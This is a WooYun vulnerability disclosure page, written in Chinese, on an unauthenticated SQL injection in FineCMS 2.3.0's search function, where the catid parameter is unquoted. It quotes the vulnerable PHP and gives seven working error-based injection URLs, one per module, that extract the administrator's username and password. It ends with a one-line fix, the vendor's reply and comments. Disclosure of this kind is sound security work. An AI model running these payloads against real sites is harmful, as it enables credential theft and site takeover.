当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060196

漏洞标题:FineCMS设计缺陷导致大面积SQL注入

相关厂商:dayrui.com

漏洞作者: xfkxfk

提交时间:2014-05-12 11:47

修复时间:2014-08-10 11:48

公开时间:2014-08-10 11:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-12: 细节已通知厂商并且等待厂商处理中
2014-05-12: 厂商已经确认,细节仅向厂商公开
2014-05-15: 细节向第三方安全合作伙伴开放
2014-07-06: 细节向核心白帽子及相关领域专家公开
2014-07-16: 细节向普通白帽子公开
2014-07-26: 细节向实习白帽子公开
2014-08-10: 细节向公众公开

简要描述:

FineCMS设计缺陷导致大面积SQL注入

详细说明:

finecms最新版2.3.0,官方2014年4月18号更新。
finecms某功能存在SQL注入,无需登陆,可直接注入获取管理员账号。
此功能在多个模块使用,导致注入大面积爆发。
此漏洞整个MCS都在使用,导致漏洞大面积存在。
文件/FineCMSv2.3.0/dayrui/core/D_Module.php:

/**
         * 模块内容搜索页 
         */
        protected function _search() {
        
                $this->load->model('search_model');
                $mod = $this->get_cache
('module-'.SITE_ID.'-'.APP_DIR);
                // 清除过期缓存
                $this->search_model->clear($mod
['setting']['search']['cache']);
                // 搜索参数
                $get = $this->input->get(NULL, TRUE);
                $get = isset($get['rewrite']) ? 
dr_rewrite_decode($get['rewrite']) : $get;
                $id = $get['id'];
                $catid = (int)$get['catid'];
                $get['keyword'] = str_replace(array
('%', ' '), array('', '%'), $get['keyword']);
                unset($get['c'], $get['m'], $get
['id'], $get['page']);
                // 关键字个数判断
                if ($get['keyword'] && strlen($get
['keyword']) < (int)$mod['setting']['search']
['length']) {
                        $this->msg(lang('mod-31'));
                }
                if ($id) { // 读缓存数据
                        $data = $this->search_model-
>get($id);
                        $catid = $data['catid'];
                        $data['get'] = $data
['params'];
                        if (!$data) {
                $this->msg(lang('mod-32'));
            }
                } else { // 组合搜索条件
                        $data = $this->search_model-
>set($get);
                }
                list($parent, $related) = $this-
>_related_cat($mod, $catid);
                $urlrule = $mod['setting']['search']
['rewrite'] ? 'search-id-{id}-page-{page}.html' : 
'index.php?c=search&id={id}&page={page}';
                $this->template->assign
(dr_category_seo($mod, $mod['category'][$catid], max
(1, (int)$this->input->get('page'))));
                $this->template->assign(array(
                        'get' => $get,
                        'cat' => $mod['category']
[$catid],
                        'caitd' => $catid,
                        'parent' => $parent,
                        'related' => $related,
                        'keyword' => $get['keyword'],
                        'urlrule' => str_replace
('{id}', $data['id'], $urlrule),
                ));
                $this->template->assign($data);
                $this->template->display
('search.html');
        }
        
        /**
     * 顶级可用栏目
     */
    public function show_select_category() {
        
                $data = array();
                $category = $this->get_cache
('module-'.SITE_ID.'-'.APP_DIR, 'category');
                
        foreach ($category as $t) {
                        if (!$t['child'] && $t
['permission'][$this->member['mark']]['add']) {
                                $pids = explode(',', 
$t['pids']);
                                $pid = (int)$pids[1];
                                if (isset($category
[$pid])) {
                                        $category
[$pid]['mark'] = 1;
                                        $data[$pid] = 
$category[$pid];
                                }
                        }
                }
                
                $this->template->assign(array(
                        'id' => 2,
                        'list' => $data
                ));
                $this->template->display
('category_select.html');
    }


在组合搜索条件时处理了get参数。
文件,/FineCMS v2.3.0/dayrui/models/Search_model.php:

public function set($get) {
        
                // 查询表名称
                $table = $this->db->dbprefix
(SITE_ID.'_'.APP_DIR);
                $table_more = $this->db->dbprefix
(SITE_ID.'_'.APP_DIR.'_category_data');
.........
// 栏目的字段
                if ($get['catid']) {
                        $more = FALSE;
                        $cat_field = $module
['category'][$get['catid']]['field'];
                        $where[0] = '`'.
$table.'`.`catid`'.($module['category'][$get
['catid']]['child'] ? 'IN ('.$module['category'][$get
['catid']]['childids'].')' : '='.$get['catid']);
                        if ($cat_field) {
                                foreach ($cat_field as 
$name => $field) {
                                        if (isset
($get[$name]) && $get[$name]) {
                                                $more 
= TRUE;
                                                
$where[] = $this->_where($table_more, $name, $get
[$name], $cat_field);
                                        }
                                        if (isset
($_order_by[$name])) {
                                                $more 
= TRUE;
                                                
$order_by[] = '`'.$table.'`.`'.$name.'` '.$_order_by
[$name];
                                        }
                                }
                        }
                        if ($more) $from.= ' LEFT JOIN 
`'.$table_more.'` ON `'.$table.'`.`id`=`'.
$table_more.'`.`id`';
                }
.........


在处理栏目字段时:

$where[0] = '`'.$table.'`.`catid`'.($module
['category'][$get['catid']]['child'] ? 'IN ('.$module
['category'][$get['catid']]['childids'].')' : '='.
$get['catid']);


对参数carid没有加引号保护,导致SQL注入。
此问题在多个模块都进行了引用,导致多个漏洞存在。
具体见漏洞证明。

漏洞证明:

第一处SQL注入,在book模块处:

http://localhost/book/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000


第二处SQL注入,在down模块处:

http://localhost/down/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000


第三处SQL注入,在fang模块处:

http://localhost/fang/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000


第四处SQL注入,在news模块处:

http://localhost/news/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000


第五处SQL注入,在photo模块处:

http://localhost/photo/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000


第六处SQL注入,在special模块处:

http://localhost/special/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000


第七处SQL注入,在video模块处:

http://localhost/video/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000

修复方案:

过滤,对catid添加单引号保护

版权声明:转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-05-12 14:04

厂商回复:

上个月就修复了

最新状态:

暂无

漏洞评价:

评论

  1. 2014-05-12 12:41 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    来围观大面积

  2. 2014-05-12 12:56 | xfkxfk 认证白帽子 ( 核心白帽子 | Rank:2179 漏洞数:338 | 呵呵!)

    @wefgod 额,大牛请绕道~~~

  3. 2014-05-12 16:26 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @xfkxfk 哈哈,非也,不是大牛,所以不绕道了

  4. 2014-06-02 22:52 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    你是不是吓坏厂商了

  5. 2014-06-02 22:53 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    上个月就修复了 是啥情况,厂商为什么这么说,又是内部获取到消息?

  6. 2015-04-09 09:43 | Winck ( 路人 | Rank:8 漏洞数:2 | http://weibo.com/hackwinck hackwinck By...)

    厂商被你吓坏了